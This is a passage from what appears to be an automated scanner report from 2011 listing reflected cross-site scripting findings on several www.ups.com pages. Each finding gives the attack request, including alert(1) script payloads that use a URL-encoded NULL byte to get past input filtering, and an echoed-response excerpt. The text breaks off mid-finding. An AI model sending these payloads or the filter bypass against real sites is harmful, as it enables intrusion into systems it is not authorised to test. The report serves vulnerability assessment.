The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93460"%20a%3db%2031fb5663470 was submitted in the REST URL parameter 1. This input was echoed as 93460" a=b 31fb5663470 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osa93460"%20a%3db%2031fb5663470/orderSupplies HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41087

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/osa93460" a=b 31fb5663470/orderSupplies?appid=WBSO">
...[SNIP]...

1.444. https://www.ups.com/osa/orderSupplies [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/osa/orderSupplies

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload ba640%0a7ba9ebff89 was submitted in the REST URL parameter 1. This input was echoed as ba640
7ba9ebff89 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osaba640%0a7ba9ebff89/orderSupplies HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41077

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
d = "";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/osaba640
7ba9ebff89/orderSupplies?appid=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.c
...[SNIP]...

1.445. https://www.ups.com/osa/orderSupplies [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/osa/orderSupplies

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 757e7%0a4c6ea7d00f3 was submitted in the REST URL parameter 2. This input was echoed as 757e7
4c6ea7d00f3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osa/orderSupplies757e7%0a4c6ea7d00f3 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41096

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
heForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/osa/orderSupplies757e7
4c6ea7d00f3?appid=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/osa/orderSu
...[SNIP]...

1.446. https://www.ups.com/osa/orderSupplies [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/osa/orderSupplies

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75362"%20a%3db%205c4e0ed9a9d was submitted in the REST URL parameter 2. This input was echoed as 75362" a=b 5c4e0ed9a9d in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osa/orderSupplies75362"%20a%3db%205c4e0ed9a9d HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:42 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41085

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/osa/orderSupplies75362" a=b 5c4e0ed9a9d?appid=WBSO">
...[SNIP]...

1.447. https://www.ups.com/osa/orderSupplies [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/osa/orderSupplies

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b4d1'%3b2aeeb4d514c was submitted in the REST URL parameter 2. This input was echoed as 7b4d1';2aeeb4d514c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osa/orderSupplies7b4d1'%3b2aeeb4d514c HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:46 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41020

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/osa/orderSupplies7b4d1';2aeeb4d514c?appid=WBSO';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/osa/orderSupplies7b4d1';2aeeb4d514c?appid=WBSO';
actionUrl = "/one-to-
...[SNIP]...

1.448. https://www.ups.com/osa/orderSupplies [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/osa/orderSupplies

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %001b456</script><script>alert(1)</script>dcaf37ce584 was submitted in the loc parameter. This input was echoed as 1b456</script><script>alert(1)</script>dcaf37ce584 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osa/orderSupplies?loc=en_US%001b456</script><script>alert(1)</script>dcaf37ce584&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:20 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9761







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_1b456</script><script>alert(1)</script>dcaf37ce584&appid=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_1b45
...[SNIP]...

1.449. https://www.ups.com/osa/orderSupplies [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/osa/orderSupplies

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %002cecd'-alert(1)-'557a7bd6f89 was submitted in the loc parameter. This input was echoed as 2cecd'-alert(1)-'557a7bd6f89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osa/orderSupplies?loc=en_US%002cecd'-alert(1)-'557a7bd6f89&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9085







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
6f89&appid=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_2cecd'-alert(1)-'557a7bd6f89&appid=WBSO';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_2cecd'-alert(1)-'557a7bd6f89&appid=WBSO';
actionUrl = "/one-to-
...[SNIP]...

1.450. https://www.ups.com/osa/orderSupplies [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/osa/orderSupplies

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ca0f2"><script>alert(1)</script>02364017778 was submitted in the loc parameter. This input was echoed as ca0f2"><script>alert(1)</script>02364017778 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osa/orderSupplies?loc=en_US%00ca0f2"><script>alert(1)</script>02364017778&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9661







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_ca0f2"><script>alert(1)</script>02364017778&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_ca0f2%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B02364017778%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.451. https://www.ups.com/quantum_services/download [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/quantum_services/download

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %0028dc6</script><script>alert(1)</script>564d2e80867 was submitted in the loc parameter. This input was echoed as 28dc6</script><script>alert(1)</script>564d2e80867 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /quantum_services/download?loc=en_US%0028dc6</script><script>alert(1)</script>564d2e80867&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:22 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15351







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_28dc6</script><script>alert(1)</script>564d2e80867&appid=IOVS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_28dc
...[SNIP]...

1.452. https://www.ups.com/quantum_services/download [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/quantum_services/download

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0065b40"><script>alert(1)</script>7de82a96742 was submitted in the loc parameter. This input was echoed as 65b40"><script>alert(1)</script>7de82a96742 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /quantum_services/download?loc=en_US%0065b40"><script>alert(1)</script>7de82a96742&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15230







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_65b40"><script>alert(1)</script>7de82a96742&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_65b40%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B7de82a96742%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.453. https://www.ups.com/quantum_services/download [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/quantum_services/download

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00933e4'-alert(1)-'a0dc40a090a was submitted in the loc parameter. This input was echoed as 933e4'-alert(1)-'a0dc40a090a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /quantum_services/download?loc=en_US%00933e4'-alert(1)-'a0dc40a090a&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:16 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14525







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
090a&appid=IOVS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_933e4'-alert(1)-'a0dc40a090a&appid=IOVS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_933e4'-alert(1)-'a0dc40a090a&appid=IOVS';
actionUrl = "/one-to-
...[SNIP]...

1.454. https://www.ups.com/qvadmin/admin [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/qvadmin/admin

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 524bb"%20a%3db%2057ee68500f4 was submitted in the REST URL parameter 1. This input was echoed as 524bb" a=b 57ee68500f4 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadmin524bb"%20a%3db%2057ee68500f4/admin HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44537

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/qvadmin524bb" a=b 57ee68500f4/admin?appid=CVA">
...[SNIP]...

1.455. https://www.ups.com/qvadmin/admin [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/qvadmin/admin

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload f8608%0a756b3f1e78a was submitted in the REST URL parameter 1. This input was echoed as f8608
756b3f1e78a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadminf8608%0a756b3f1e78a/admin HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:34 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44436

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/qvadminf8608
756b3f1e78a/admin?appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/qvadmi
...[SNIP]...

1.456. https://www.ups.com/qvadmin/admin [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/qvadmin/admin

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8127'%3b5afbf672e81 was submitted in the REST URL parameter 1. This input was echoed as a8127';5afbf672e81 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadmina8127'%3b5afbf672e81/admin HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44453

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
admin?appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/qvadmina8127';5afbf672e81/admin?appid=CVA';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/qvadmina8127';5afbf672e81/admin?appid=CVA';
actionUrl = "/one-to-
...[SNIP]...

1.457. https://www.ups.com/qvadmin/admin [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/qvadmin/admin

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 5ce57%0ac1d85533e83 was submitted in the REST URL parameter 2. This input was echoed as 5ce57
c1d85533e83 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadmin/admin5ce57%0ac1d85533e83 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:48 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44436

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/qvadmin/admin5ce57
c1d85533e83?appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/qvadmin/admi
...[SNIP]...

1.458. https://www.ups.com/qvadmin/admin [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/qvadmin/admin

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c0c8'%3b1919f17d50a was submitted in the REST URL parameter 2. This input was echoed as 6c0c8';1919f17d50a in the application's response.

